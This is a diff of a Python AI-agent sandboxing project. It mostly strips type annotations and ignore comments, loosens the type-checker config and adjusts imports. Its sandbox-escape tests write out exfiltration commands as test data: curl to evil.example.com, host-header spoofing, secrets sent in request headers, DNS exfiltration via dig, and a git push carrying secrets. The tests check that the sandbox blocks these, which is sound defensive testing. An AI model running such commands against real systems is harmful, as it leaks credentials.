@@ -284,7 +283,7 @@ def _split_flow(body: str, lineno: int, kind: str) -> list[str]:
depth_c = 0 depth_c = 0
in_single = False in_single = False
in_double = False in_double = False
cur: list[str] = [] cur = []
for ch in body: for ch in body:
if ch == "'" and not in_double: if ch == "'" and not in_double:
in_single = not in_single in_single = not in_single
@@ -331,7 +330,6 @@ def _split_key_value(content: str, lineno: int) -> tuple[str, str]:
if i + 1 >= len(content) or content[i + 1] in (" ", "\t"): if i + 1 >= len(content) or content[i + 1] in (" ", "\t"):
return content[:i].strip(), content[i + 1:].lstrip() return content[:i].strip(), content[i + 1:].lstrip()
die(f"yaml-subset: line {lineno} missing `: ` separator: {content!r}") die(f"yaml-subset: line {lineno} missing `: ` separator: {content!r}")
return "", "" # unreachable, but needed for type checker
def _parse_block( def _parse_block(
@@ -538,7 +536,7 @@ def parse_yaml_subset(text: str) -> dict[str, object]:
) )
if not isinstance(value, dict): if not isinstance(value, dict):
die("yaml-subset: top-level value must be a mapping") die("yaml-subset: top-level value must be a mapping")
return cast(dict[str, object], value) return value
def parse_frontmatter(text: str) -> tuple[dict[str, object], str]: def parse_frontmatter(text: str) -> tuple[dict[str, object], str]:
+1 -6
View File
@@ -11,10 +11,5 @@
], ],
"pythonVersion": "3.11", "pythonVersion": "3.11",
"typeCheckingMode": "strict", "typeCheckingMode": "strict",
"reportMissingTypeStubs": "none", "reportMissingTypeStubs": "none"
"reportUnknownMemberType": false,
"reportUnknownParameterType": false,
"reportUnknownVariableType": false,
"reportUnknownArgumentType": false,
"reportPrivateUsage": false
} }
+2 -2
View File
@@ -32,11 +32,11 @@ from bot_bottle.backend.docker.network import (
network_create_internal, network_create_internal,
network_remove, network_remove,
) )
from bot_bottle.pipelock import ( from bot_bottle.backend.docker.pipelock import (
PIPELOCK_CA_CERT_IN_CONTAINER, PIPELOCK_CA_CERT_IN_CONTAINER,
PIPELOCK_CA_KEY_IN_CONTAINER, PIPELOCK_CA_KEY_IN_CONTAINER,
pipelock_tls_init,
) )
from bot_bottle.backend.docker.pipelock import pipelock_tls_init
from bot_bottle.pipelock import PipelockProxy from bot_bottle.pipelock import PipelockProxy
from bot_bottle.backend.docker.pipelock_apply import ( from bot_bottle.backend.docker.pipelock_apply import (
PipelockApplyError, PipelockApplyError,
+16 -16
View File
@@ -195,10 +195,10 @@ class TestSandboxEscape(unittest.TestCase):
except BaseException: except BaseException:
pass pass
cls._identity = "" cls._identity = ""
if cls._stage_dir is not None: # type: ignore if cls._stage_dir is not None:
shutil.rmtree(cls._stage_dir, ignore_errors=True) shutil.rmtree(cls._stage_dir, ignore_errors=True)
cls._stage_dir = None # type: ignore[assignment] cls._stage_dir = None # type: ignore[assignment]
if cls._key_path is not None: # type: ignore if cls._key_path is not None:
try: try:
cls._key_path.unlink() cls._key_path.unlink()
except OSError: except OSError:
@@ -212,7 +212,7 @@ class TestSandboxEscape(unittest.TestCase):
`bottle.egress.routes` (only api.anthropic.com is). Pipelock `bottle.egress.routes` (only api.anthropic.com is). Pipelock
or egress should reject the request with a non-200 response, or egress should reject the request with a non-200 response,
and the actual upstream's content must not appear in stdout.""" and the actual upstream's content must not appear in stdout."""
r = self._bottle.exec( # type: ignore r = self._bottle.exec(
'curl --silent --show-error --max-time 8 --fail ' 'curl --silent --show-error --max-time 8 --fail '
'https://evil.example.com/' 'https://evil.example.com/'
) )
@@ -232,7 +232,7 @@ class TestSandboxEscape(unittest.TestCase):
hostname to a non-allowlisted IP. Pipelock should hostname to a non-allowlisted IP. Pipelock should
not honor the spoof (it does its own resolution).""" not honor the spoof (it does its own resolution)."""
with self.subTest(attack="direct IP"): with self.subTest(attack="direct IP"):
r = self._bottle.exec( # type: ignore r = self._bottle.exec(
'curl --silent --show-error --max-time 8 --fail ' 'curl --silent --show-error --max-time 8 --fail '
'https://198.51.100.1/' 'https://198.51.100.1/'
) )
@@ -243,7 +243,7 @@ class TestSandboxEscape(unittest.TestCase):
) )
with self.subTest(attack="host-header spoof"): with self.subTest(attack="host-header spoof"):
r = self._bottle.exec( # type: ignore r = self._bottle.exec(
'curl --silent --show-error --max-time 8 --fail ' 'curl --silent --show-error --max-time 8 --fail '
'--resolve api.anthropic.com:443:198.51.100.1 ' '--resolve api.anthropic.com:443:198.51.100.1 '
'https://api.anthropic.com/' 'https://api.anthropic.com/'
@@ -265,13 +265,13 @@ class TestSandboxEscape(unittest.TestCase):
# `"blocked: request body contains secret"`). # `"blocked: request body contains secret"`).
_SANDBOX_BLOCK_MARKERS = ("egress:", "pipelock", "blocked:") _SANDBOX_BLOCK_MARKERS = ("egress:", "pipelock", "blocked:")
def _assert_sandbox_block(self, label: str, r: object) -> None: # type: ignore def _assert_sandbox_block(self, label: str, r) -> None:
"""A real sandbox block produces an HTTP 403 with a """A real sandbox block produces an HTTP 403 with a
recognizable sandbox sidecar marker in the body. ANY recognizable sandbox sidecar marker in the body. ANY
other outcome (200 from upstream, 401/404 from upstream, other outcome (200 from upstream, 401/404 from upstream,
non-marker 5xx) means the request escaped the secret non-marker 5xx) means the request escaped the secret
reached the network.""" reached the network."""
body_and_code = (r.stdout or "").strip() # type: ignore body_and_code = (r.stdout or "").strip()
# The curl invocation appends `\nHTTP_CODE:%{http_code}` so # The curl invocation appends `\nHTTP_CODE:%{http_code}` so
# we can disambiguate. Split that off. # we can disambiguate. Split that off.
http_code = "" http_code = ""
@@ -281,7 +281,7 @@ class TestSandboxEscape(unittest.TestCase):
body, _, http_code = body_and_code.rpartition(marker) body, _, http_code = body_and_code.rpartition(marker)
http_code = http_code.strip() http_code = http_code.strip()
body = body.rstrip() body = body.rstrip()
haystack = (body + " " + (r.stderr or "")).lower() # type: ignore haystack = (body + " " + (r.stderr or "")).lower()
has_marker = any(m in haystack for m in self._SANDBOX_BLOCK_MARKERS) has_marker = any(m in haystack for m in self._SANDBOX_BLOCK_MARKERS)
self.assertTrue( self.assertTrue(
has_marker and http_code == "403", has_marker and http_code == "403",
@@ -290,7 +290,7 @@ class TestSandboxEscape(unittest.TestCase):
f"If the response came from the actual upstream, the " f"If the response came from the actual upstream, the "
f"secret REACHED the network — that's the leak this " f"secret REACHED the network — that's the leak this "
f"test exists to catch. body={body!r} " f"test exists to catch. body={body!r} "
f"stderr={(r.stderr or '').strip()!r}", # type: ignore f"stderr={(r.stderr or '').strip()!r}",
) )
def test_3_http_exfil_blocked(self) -> None: def test_3_http_exfil_blocked(self) -> None:
@@ -343,9 +343,9 @@ class TestSandboxEscape(unittest.TestCase):
f'-H "X-Custom: $TEST_SECRET_ANTHROPIC"', f'-H "X-Custom: $TEST_SECRET_ANTHROPIC"',
), ),
] ]
for name, cmd in shapes: # type: ignore for name, cmd in shapes:
with self.subTest(shape=name): with self.subTest(shape=name):
r = self._bottle.exec(cmd) # type: ignore r = self._bottle.exec(cmd)
self._assert_sandbox_block(name, r) self._assert_sandbox_block(name, r)
# ---- attack 4: DNS exfil ----------------------------------------- # ---- attack 4: DNS exfil -----------------------------------------
@@ -365,7 +365,7 @@ class TestSandboxEscape(unittest.TestCase):
intact (PRD 0022 Q2).""" intact (PRD 0022 Q2)."""
with self.subTest(attack="crafted subdomain"): with self.subTest(attack="crafted subdomain"):
r = self._bottle.exec( # type: ignore r = self._bottle.exec(
'curl --silent --show-error --max-time 8 --fail ' 'curl --silent --show-error --max-time 8 --fail '
'"https://$TEST_SECRET_GENERIC.api.anthropic.com/"' '"https://$TEST_SECRET_GENERIC.api.anthropic.com/"'
) )
@@ -379,7 +379,7 @@ class TestSandboxEscape(unittest.TestCase):
# `+short +tries=1 +time=3`: no debug output, one attempt, # `+short +tries=1 +time=3`: no debug output, one attempt,
# 3s timeout. Outside the internal network has no path; # 3s timeout. Outside the internal network has no path;
# dig should fail or return empty. # dig should fail or return empty.
r = self._bottle.exec( # type: ignore r = self._bottle.exec(
'dig +short +tries=1 +time=3 @8.8.8.8 ' 'dig +short +tries=1 +time=3 @8.8.8.8 '
'"$TEST_SECRET_GENERIC.example.com" ' '"$TEST_SECRET_GENERIC.example.com" '
'; echo "EXIT=$?"' '; echo "EXIT=$?"'
@@ -431,7 +431,7 @@ class TestSandboxEscape(unittest.TestCase):
with self.subTest(secret=name): with self.subTest(secret=name):
# Fresh repo per shape so prior commits don't # Fresh repo per shape so prior commits don't
# confuse gitleaks's diff. -rm -rf is best-effort. # confuse gitleaks's diff. -rm -rf is best-effort.
script = ( # type: ignore script = (
'set -eu\n' 'set -eu\n'
'cd /tmp\n' 'cd /tmp\n'
'rm -rf sandbox-escape-repo\n' 'rm -rf sandbox-escape-repo\n'
@@ -446,8 +446,8 @@ class TestSandboxEscape(unittest.TestCase):
f'git remote add origin {upstream_url}\n' f'git remote add origin {upstream_url}\n'
'git push origin HEAD:refs/heads/master 2>&1\n' 'git push origin HEAD:refs/heads/master 2>&1\n'
) )
r = self._bottle.exec(script) # type: ignore r = self._bottle.exec(script)
combined = (r.stderr + r.stdout).lower() # type: ignore combined = (r.stderr + r.stdout).lower()
self.assertNotEqual( self.assertNotEqual(
0, r.returncode, 0, r.returncode,
+1 -1
View File
@@ -16,7 +16,7 @@ from bot_bottle.egress import CODEX_HOST_CREDENTIAL_TOKEN_REF
def _jwt(exp: int) -> str: def _jwt(exp: int) -> str:
def enc(obj: dict[str, object]) -> str: # type: ignore def enc(obj: dict) -> str:
raw = json.dumps(obj, separators=(",", ":")).encode() raw = json.dumps(obj, separators=(",", ":")).encode()
return base64.urlsafe_b64encode(raw).decode().rstrip("=") return base64.urlsafe_b64encode(raw).decode().rstrip("=")
return f"{enc({'alg': 'none'})}.{enc({'exp': exp})}.sig" return f"{enc({'alg': 'none'})}.{enc({'exp': exp})}.sig"
+2 -2
View File
@@ -175,9 +175,9 @@ class TestExecUserSwitching(unittest.TestCase):
class TestExecResultParity(unittest.TestCase): class TestExecResultParity(unittest.TestCase):
"""Both backends return ExecResult with returncode, stdout, stderr.""" """Both backends return ExecResult with returncode, stdout, stderr."""
def _stub_run(self, argv: object, **kwargs: object) -> object: # type: ignore def _stub_run(self, argv, **kwargs):
return subprocess.CompletedProcess( return subprocess.CompletedProcess(
argv, 0, stdout="out\n", stderr="err\n", # type: ignore argv, 0, stdout="out\n", stderr="err\n",
) )
def test_docker_exec_result_shape(self): def test_docker_exec_result_shape(self):
+6 -6
View File
@@ -65,7 +65,7 @@ class TestEnumerateActiveAgents(unittest.TestCase):
) )
class _FakeBackend: class _FakeBackend:
def __init__(self, items: object, available: object = True) -> None: # type: ignore def __init__(self, items, available=True):
self._items = items self._items = items
self._available = available self._available = available
@@ -100,13 +100,13 @@ class TestEnumerateActiveAgents(unittest.TestCase):
) )
class _FakeBackend: class _FakeBackend:
def __init__(self, items: object) -> None: # type: ignore def __init__(self, items):
self._items = items self._items = items
def is_available(self) -> bool: def is_available(self):
return True return True
def enumerate_active(self) -> object: def enumerate_active(self):
return self._items return self._items
with patch.object( with patch.object(
@@ -150,11 +150,11 @@ class TestEnumerateActiveAgents(unittest.TestCase):
) )
class _FakeBackend: class _FakeBackend:
def __init__(self, items: object, available: object) -> None: # type: ignore def __init__(self, items, available):
self._items = items self._items = items
self._available = available self._available = available
def is_available(self) -> object: def is_available(self):
return self._available return self._available
def enumerate_active(self): def enumerate_active(self):
+3 -3
View File
@@ -67,13 +67,13 @@ class TestApplyCapabilityChange(_FakeHomeMixin, unittest.TestCase):
self._orig_push = capability_apply._push_working_tree self._orig_push = capability_apply._push_working_tree
self._orig_teardown = capability_apply._teardown_bottle self._orig_teardown = capability_apply._teardown_bottle
def stub_snapshot(slug: object) -> None: # type: ignore def stub_snapshot(slug):
self._calls.append(f"snapshot:{slug}") self._calls.append(f"snapshot:{slug}")
def stub_push(slug: object) -> None: # type: ignore def stub_push(slug):
self._calls.append(f"push:{slug}") self._calls.append(f"push:{slug}")
def stub_teardown(slug: object) -> None: # type: ignore def stub_teardown(slug):
self._calls.append(f"teardown:{slug}") self._calls.append(f"teardown:{slug}")
capability_apply.snapshot_transcript = stub_snapshot # type: ignore[assignment] capability_apply.snapshot_transcript = stub_snapshot # type: ignore[assignment]
+4 -4
View File
@@ -31,7 +31,7 @@ class TestCmdCleanup(unittest.TestCase):
return_value=("docker", "smolmachines"), return_value=("docker", "smolmachines"),
), patch.object( ), patch.object(
cmd, "get_bottle_backend", cmd, "get_bottle_backend",
side_effect=lambda name: backends_by_name[name], # type: ignore side_effect=lambda name: backends_by_name[name],
), patch.object( ), patch.object(
cmd, "_prompt_yes", return_value=True, cmd, "_prompt_yes", return_value=True,
): ):
@@ -52,7 +52,7 @@ class TestCmdCleanup(unittest.TestCase):
return_value=("docker", "smolmachines"), return_value=("docker", "smolmachines"),
), patch.object( ), patch.object(
cmd, "get_bottle_backend", cmd, "get_bottle_backend",
side_effect=lambda name: backends_by_name[name], # type: ignore side_effect=lambda name: backends_by_name[name],
), patch.object( ), patch.object(
cmd, "_prompt_yes", cmd, "_prompt_yes",
) as prompt: ) as prompt:
@@ -71,7 +71,7 @@ class TestCmdCleanup(unittest.TestCase):
return_value=("docker", "smolmachines"), return_value=("docker", "smolmachines"),
), patch.object( ), patch.object(
cmd, "get_bottle_backend", cmd, "get_bottle_backend",
side_effect=lambda name: backends_by_name[name], # type: ignore side_effect=lambda name: backends_by_name[name],
), patch.object( ), patch.object(
cmd, "_prompt_yes", return_value=False, cmd, "_prompt_yes", return_value=False,
): ):
@@ -91,7 +91,7 @@ class TestCmdCleanup(unittest.TestCase):
return_value=("docker", "smolmachines"), return_value=("docker", "smolmachines"),
), patch.object( ), patch.object(
cmd, "get_bottle_backend", cmd, "get_bottle_backend",
side_effect=lambda name: backends_by_name[name], # type: ignore side_effect=lambda name: backends_by_name[name],
), patch.object( ), patch.object(
cmd, "_prompt_yes", return_value=True, cmd, "_prompt_yes", return_value=True,
): ):
+1 -1
View File
@@ -36,7 +36,7 @@ class TestCaptureSessionState(_FakeHomeMixin, unittest.TestCase):
# covers the real docker cp path. # covers the real docker cp path.
self._snap_calls: list[str] = [] self._snap_calls: list[str] = []
self._orig_snap = start_mod.snapshot_transcript self._orig_snap = start_mod.snapshot_transcript
start_mod.snapshot_transcript = lambda identity: ( # type: ignore start_mod.snapshot_transcript = lambda identity: (
self._snap_calls.append(identity) self._snap_calls.append(identity)
) )
+11 -11
View File
@@ -21,14 +21,14 @@ def _jwt(exp: int) -> str:
return _jwt_with_payload({"exp": exp}) return _jwt_with_payload({"exp": exp})
def _jwt_with_payload(payload: dict[str, object]) -> str: # type: ignore def _jwt_with_payload(payload: dict) -> str:
def enc(obj: dict[str, object]) -> str: # type: ignore def enc(obj: dict) -> str:
raw = json.dumps(obj, separators=(",", ":")).encode() raw = json.dumps(obj, separators=(",", ":")).encode()
return base64.urlsafe_b64encode(raw).decode().rstrip("=") return base64.urlsafe_b64encode(raw).decode().rstrip("=")
return f"{enc({'alg': 'none'})}.{enc(payload)}.sig" return f"{enc({'alg': 'none'})}.{enc(payload)}.sig"
def _jwt_payload(token: str) -> dict[str, object]: # type: ignore def _jwt_payload(token: str) -> dict:
payload = token.split(".")[1] payload = token.split(".")[1]
payload += "=" * (-len(payload) % 4) payload += "=" * (-len(payload) % 4)
return json.loads(base64.urlsafe_b64decode(payload.encode()).decode()) return json.loads(base64.urlsafe_b64decode(payload.encode()).decode())
@@ -43,7 +43,7 @@ class TestCodexHostAccessToken(unittest.TestCase):
def tearDown(self): def tearDown(self):
self.tmp.cleanup() self.tmp.cleanup()
def _write(self, payload: dict[str, object]) -> None: # type: ignore def _write(self, payload: dict) -> None:
self.auth_path.write_text(json.dumps(payload)) self.auth_path.write_text(json.dumps(payload))
def test_auth_path_uses_codex_home(self): def test_auth_path_uses_codex_home(self):
@@ -210,11 +210,11 @@ class TestCodexHostAccessToken(unittest.TestCase):
access_payload = _jwt_payload(dummy["tokens"]["access_token"]) access_payload = _jwt_payload(dummy["tokens"]["access_token"])
auth = access_payload["https://api.openai.com/auth"] auth = access_payload["https://api.openai.com/auth"]
profile = access_payload["https://api.openai.com/profile"] profile = access_payload["https://api.openai.com/profile"]
self.assertEqual("plus", auth["chatgpt_plan_type"]) # type: ignore self.assertEqual("plus", auth["chatgpt_plan_type"])
self.assertEqual("acct-real", auth["chatgpt_account_id"]) # type: ignore self.assertEqual("acct-real", auth["chatgpt_account_id"])
self.assertEqual("bot-bottle-placeholder", auth["chatgpt_user_id"]) # type: ignore self.assertEqual("bot-bottle-placeholder", auth["chatgpt_user_id"])
self.assertEqual("bot-bottle@example.invalid", profile["email"]) # type: ignore self.assertEqual("bot-bottle@example.invalid", profile["email"])
self.assertTrue(profile["email_verified"]) # type: ignore self.assertTrue(profile["email_verified"])
def test_dummy_auth_redacts_unknown_future_auth_fields(self): def test_dummy_auth_redacts_unknown_future_auth_fields(self):
secrets = [ secrets = [
@@ -289,8 +289,8 @@ class TestCodexHostAccessToken(unittest.TestCase):
self.assertEqual({}, access_payload["future_nested"]) self.assertEqual({}, access_payload["future_nested"])
self.assertEqual([], access_payload["future_list"]) self.assertEqual([], access_payload["future_list"])
auth = access_payload["https://api.openai.com/auth"] auth = access_payload["https://api.openai.com/auth"]
self.assertEqual("bot-bottle-placeholder", auth["session_context"]) # type: ignore self.assertEqual("bot-bottle-placeholder", auth["session_context"])
self.assertEqual({}, auth["nested"]) # type: ignore self.assertEqual({}, auth["nested"])
if __name__ == "__main__": if __name__ == "__main__":
+5 -6
View File
@@ -12,7 +12,6 @@ from __future__ import annotations
import subprocess import subprocess
import unittest import unittest
from pathlib import Path from pathlib import Path
from typing import Any
from unittest import mock from unittest import mock
from bot_bottle.agent_provider import AgentProvisionPlan from bot_bottle.agent_provider import AgentProvisionPlan
@@ -46,7 +45,7 @@ def _manifest(*, supervise: bool, with_git: bool, with_egress: bool) -> Manifest
"""Minimal manifest with the toggles the chunk-1 matrix needs. """Minimal manifest with the toggles the chunk-1 matrix needs.
The renderer only reads from the plan, not the manifest, so this The renderer only reads from the plan, not the manifest, so this
is just here to back BottleSpec.""" is just here to back BottleSpec."""
bottle: dict[str, object] = {} bottle: dict = {}
if supervise: if supervise:
bottle["supervise"] = True bottle["supervise"] = True
if with_git: if with_git:
@@ -272,13 +271,13 @@ class TestAgentAlwaysPresent(unittest.TestCase):
dockerfile="", dockerfile="",
guest_env={"CODEX_HOME": "/home/node/.codex"}, guest_env={"CODEX_HOME": "/home/node/.codex"},
) )
plan = type(plan)(**{**vars(plan), "agent_provision": provision}) # type: ignore plan = type(plan)(**{**vars(plan), "agent_provision": provision})
s = bottle_plan_to_compose(plan)["services"]["agent"] s = bottle_plan_to_compose(plan)["services"]["agent"]
self.assertIn("CODEX_HOME=/home/node/.codex", s["environment"]) self.assertIn("CODEX_HOME=/home/node/.codex", s["environment"])
def test_agent_runsc_runtime(self): def test_agent_runsc_runtime(self):
plan = _plan() plan = _plan()
plan = type(plan)(**{**vars(plan), "use_runsc": True}) # type: ignore plan = type(plan)(**{**vars(plan), "use_runsc": True})
s = bottle_plan_to_compose(plan)["services"]["agent"] s = bottle_plan_to_compose(plan)["services"]["agent"]
self.assertEqual("runsc", s["runtime"]) self.assertEqual("runsc", s["runtime"])
@@ -310,8 +309,8 @@ class TestSidecarBundleShape(unittest.TestCase):
+ supervise). PRD 0024 chunk 5 dropped the legacy four-sidecar + supervise). PRD 0024 chunk 5 dropped the legacy four-sidecar
shape entirely, so the bundle is the only thing exercised here.""" shape entirely, so the bundle is the only thing exercised here."""
def _render(self, **plan_kwargs: object) -> Any: # type: ignore def _render(self, **plan_kwargs):
return bottle_plan_to_compose(_plan(**plan_kwargs)) # type: ignore return bottle_plan_to_compose(_plan(**plan_kwargs))
def test_emits_two_services_minimal(self): def test_emits_two_services_minimal(self):
spec = self._render() spec = self._render()
+3 -3
View File
@@ -52,7 +52,7 @@ def _plan(
agent_provision: AgentProvisionPlan | None = None, agent_provision: AgentProvisionPlan | None = None,
supervise: bool = False, supervise: bool = False,
) -> DockerBottlePlan: ) -> DockerBottlePlan:
bottle_json: dict = {"agent_provider": {"template": "claude"}} # type: ignore bottle_json: dict = {"agent_provider": {"template": "claude"}}
if supervise: if supervise:
bottle_json["supervise"] = True bottle_json["supervise"] = True
manifest = Manifest.from_json_obj({ manifest = Manifest.from_json_obj({
@@ -165,7 +165,7 @@ class TestClaudeProvisionSkills(unittest.TestCase):
bottle = _make_bottle() bottle = _make_bottle()
with patch( with patch(
"bot_bottle.backend.util.host_skill_dir", "bot_bottle.backend.util.host_skill_dir",
side_effect=lambda n: f"/host/skills/{n}", # type: ignore side_effect=lambda n: f"/host/skills/{n}",
), patch( ), patch(
"bot_bottle.contrib.claude.agent_provider.os.path.isdir", "bot_bottle.contrib.claude.agent_provider.os.path.isdir",
return_value=True, return_value=True,
@@ -191,7 +191,7 @@ class TestClaudeProvisionSkills(unittest.TestCase):
bottle = _make_bottle() bottle = _make_bottle()
with patch( with patch(
"bot_bottle.backend.util.host_skill_dir", "bot_bottle.backend.util.host_skill_dir",
side_effect=lambda n: f"/host/skills/{n}", # type: ignore side_effect=lambda n: f"/host/skills/{n}",
), patch( ), patch(
"bot_bottle.contrib.claude.agent_provider.os.path.isdir", "bot_bottle.contrib.claude.agent_provider.os.path.isdir",
return_value=False, return_value=False,
+2 -2
View File
@@ -53,7 +53,7 @@ def _plan(
agent_provision: AgentProvisionPlan | None = None, agent_provision: AgentProvisionPlan | None = None,
supervise: bool = False, supervise: bool = False,
) -> DockerBottlePlan: ) -> DockerBottlePlan:
bottle_json: dict = {"agent_provider": {"template": "codex"}} # type: ignore bottle_json: dict = {"agent_provider": {"template": "codex"}}
if supervise: if supervise:
bottle_json["supervise"] = True bottle_json["supervise"] = True
manifest = Manifest.from_json_obj({ manifest = Manifest.from_json_obj({
@@ -153,7 +153,7 @@ class TestCodexProvisionSkills(unittest.TestCase):
bottle = _make_bottle() bottle = _make_bottle()
with patch( with patch(
"bot_bottle.backend.util.host_skill_dir", "bot_bottle.backend.util.host_skill_dir",
side_effect=lambda n: f"/host/skills/{n}", # type: ignore side_effect=lambda n: f"/host/skills/{n}",
), patch( ), patch(
"bot_bottle.contrib.codex.agent_provider.os.path.isdir", "bot_bottle.contrib.codex.agent_provider.os.path.isdir",
return_value=True, return_value=True,
+2 -2
View File
@@ -20,11 +20,11 @@ def _provisioner() -> GiteaDeployKeyProvisioner:
) )
def _urlopen_response(body: dict, status: int = 200) -> MagicMock: # type: ignore def _urlopen_response(body: dict, status: int = 200) -> MagicMock:
resp = MagicMock() resp = MagicMock()
resp.read.return_value = json.dumps(body).encode() resp.read.return_value = json.dumps(body).encode()
resp.status = status resp.status = status
resp.__enter__ = lambda s: s # type: ignore resp.__enter__ = lambda s: s
resp.__exit__ = MagicMock(return_value=False) resp.__exit__ = MagicMock(return_value=False)
return resp return resp
+1 -1
View File
@@ -99,7 +99,7 @@ class TestEnumerateActive(_FakeHomeMixin, unittest.TestCase):
self._teardown_fake_home() self._teardown_fake_home()
def _stub(self, slugs: list[str], services_by_project: dict[str, set[str]]) -> None: def _stub(self, slugs: list[str], services_by_project: dict[str, set[str]]) -> None:
_enumerate.list_active_slugs = lambda **_: slugs # type: ignore _enumerate.list_active_slugs = lambda **_: slugs
_enumerate._query_services_by_project = lambda: services_by_project _enumerate._query_services_by_project = lambda: services_by_project
def test_no_active_slugs_returns_empty(self): def test_no_active_slugs_returns_empty(self):
+2 -2
View File
@@ -24,11 +24,11 @@ from bot_bottle.pipelock import PipelockProxyPlan
from bot_bottle.workspace import workspace_plan from bot_bottle.workspace import workspace_plan
def _plan(*, git_user: dict | None = None, # type: ignore def _plan(*, git_user: dict | None = None,
copy_cwd: bool = False, copy_cwd: bool = False,
user_cwd: str = "/tmp/x", user_cwd: str = "/tmp/x",
stage_dir: Path | None = None) -> DockerBottlePlan: stage_dir: Path | None = None) -> DockerBottlePlan:
bottle_json: dict = {} # type: ignore bottle_json: dict = {}
if git_user is not None: if git_user is not None:
bottle_json["git-gate"] = {"user": git_user} bottle_json["git-gate"] = {"user": git_user}
manifest = Manifest.from_json_obj({ manifest = Manifest.from_json_obj({
+3 -3
View File
@@ -17,13 +17,13 @@ from bot_bottle.backend.docker import util as docker_mod
from bot_bottle.workspace import WorkspacePlan from bot_bottle.workspace import WorkspacePlan
def _ok(stdout: str = "", stderr: str = "") -> subprocess.CompletedProcess: # type: ignore def _ok(stdout: str = "", stderr: str = "") -> subprocess.CompletedProcess:
return subprocess.CompletedProcess( return subprocess.CompletedProcess(
args=[], returncode=0, stdout=stdout, stderr=stderr, args=[], returncode=0, stdout=stdout, stderr=stderr,
) )
def _fail(stderr: str = "boom") -> subprocess.CompletedProcess: # type: ignore def _fail(stderr: str = "boom") -> subprocess.CompletedProcess:
return subprocess.CompletedProcess( return subprocess.CompletedProcess(
args=[], returncode=1, stdout="", stderr=stderr, args=[], returncode=1, stdout="", stderr=stderr,
) )
@@ -110,7 +110,7 @@ class TestBuildImageWithCwd(unittest.TestCase):
workdir="/guest/home/workspace", workdir="/guest/home/workspace",
) )
def inspect_context(*args, **kwargs): # type: ignore def inspect_context(*args, **kwargs):
context = Path(args[0][-1]) context = Path(args[0][-1])
staged = context / "workspace" staged = context / "workspace"
self.assertTrue((staged / ".gitignore").is_file()) self.assertTrue((staged / ".gitignore").is_file())
+3 -3
View File
@@ -17,7 +17,7 @@ from bot_bottle.manifest import Manifest
from bot_bottle.yaml_subset import parse_yaml_subset from bot_bottle.yaml_subset import parse_yaml_subset
def _bottle(routes): # type: ignore def _bottle(routes):
return Manifest.from_json_obj({ return Manifest.from_json_obj({
"bottles": {"dev": {"egress": {"routes": routes}}}, "bottles": {"dev": {"egress": {"routes": routes}}},
"agents": {"demo": {"skills": [], "prompt": "", "bottle": "dev"}}, "agents": {"demo": {"skills": [], "prompt": "", "bottle": "dev"}},
@@ -257,8 +257,8 @@ class TestRenderRoutes(unittest.TestCase):
will see, not the textual layout.""" will see, not the textual layout."""
@staticmethod @staticmethod
def _parsed(routes) -> list[dict]: # type: ignore def _parsed(routes) -> list[dict]:
return parse_yaml_subset(egress_render_routes(routes))["routes"] # type: ignore return parse_yaml_subset(egress_render_routes(routes))["routes"]
def test_authenticated_route_serialised_with_auth_fields(self): def test_authenticated_route_serialised_with_auth_fields(self):
b = _bottle([{ b = _bottle([{
+3 -3
View File
@@ -159,7 +159,7 @@ class TestMatchRoute(unittest.TestCase):
def test_exact_match(self): def test_exact_match(self):
r = match_route(self.ROUTES, "api.github.com") r = match_route(self.ROUTES, "api.github.com")
self.assertIsNotNone(r) self.assertIsNotNone(r)
self.assertEqual("api.github.com", r.host) # type: ignore self.assertEqual("api.github.com", r.host)
def test_case_insensitive(self): def test_case_insensitive(self):
# DNS hostnames are case-insensitive per RFC 1035; mitmproxy # DNS hostnames are case-insensitive per RFC 1035; mitmproxy
@@ -167,7 +167,7 @@ class TestMatchRoute(unittest.TestCase):
# uppercase. Lookup must normalise. # uppercase. Lookup must normalise.
r = match_route(self.ROUTES, "API.GitHub.COM") r = match_route(self.ROUTES, "API.GitHub.COM")
self.assertIsNotNone(r) self.assertIsNotNone(r)
self.assertEqual("api.github.com", r.host) # type: ignore self.assertEqual("api.github.com", r.host)
def test_no_match_returns_none(self): def test_no_match_returns_none(self):
self.assertIsNone(match_route(self.ROUTES, "elsewhere.example")) self.assertIsNone(match_route(self.ROUTES, "elsewhere.example"))
@@ -370,7 +370,7 @@ class TestGitPushBlockFailFast(unittest.TestCase):
self.send_header("Content-Length", "0") self.send_header("Content-Length", "0")
self.end_headers() self.end_headers()
def log_message(self, _fmt, *_args): # type: ignore def log_message(self, _fmt, *_args):
pass pass
server = http.server.ThreadingHTTPServer(("127.0.0.1", 0), Handler) server = http.server.ThreadingHTTPServer(("127.0.0.1", 0), Handler)
+2 -2
View File
@@ -21,10 +21,10 @@ _ROUTES_EMPTY = "routes: []\n"
_ROUTES_ONE = 'routes:\n - host: "api.anthropic.com"\n' _ROUTES_ONE = 'routes:\n - host: "api.anthropic.com"\n'
def _routes(parsed: str) -> list[dict]: # type: ignore def _routes(parsed: str) -> list[dict]:
"""Parse a YAML routes string and pull out the routes list, so """Parse a YAML routes string and pull out the routes list, so
tests can assert on shape directly.""" tests can assert on shape directly."""
return parse_yaml_subset(parsed)["routes"] # type: ignore return parse_yaml_subset(parsed)["routes"]
class TestValidateRoutesContent(unittest.TestCase): class TestValidateRoutesContent(unittest.TestCase):
+3 -3
View File
@@ -189,7 +189,7 @@ class TestGitHttpBackend(unittest.TestCase):
try: try:
urllib.request.urlopen(req, timeout=5) urllib.request.urlopen(req, timeout=5)
self.fail("expected HTTPError 403") self.fail("expected HTTPError 403")
except urllib.error.HTTPError as e: # type: ignore except urllib.error.HTTPError as e:
self.assertEqual(403, e.code) self.assertEqual(403, e.code)
self.assertIn(b"upstream fetch failed", e.read()) self.assertIn(b"upstream fetch failed", e.read())
@@ -234,7 +234,7 @@ class TestGitHttpBackend(unittest.TestCase):
try: try:
urllib.request.urlopen(req, timeout=5) urllib.request.urlopen(req, timeout=5)
self.fail("expected HTTPError 403") self.fail("expected HTTPError 403")
except urllib.error.HTTPError as e: # type: ignore except urllib.error.HTTPError as e:
self.assertEqual(403, e.code) self.assertEqual(403, e.code)
logged = buf.getvalue() logged = buf.getvalue()
@@ -291,7 +291,7 @@ class TestContentLengthBounds(unittest.TestCase):
try: try:
with urllib.request.urlopen(req, timeout=3) as resp: with urllib.request.urlopen(req, timeout=3) as resp:
return resp.status return resp.status
except urllib.error.HTTPError as e: # type: ignore except urllib.error.HTTPError as e:
return e.code return e.code
def test_non_numeric_content_length_returns_400(self): def test_non_numeric_content_length_returns_400(self):
+4 -4
View File
@@ -22,7 +22,7 @@ from pathlib import Path
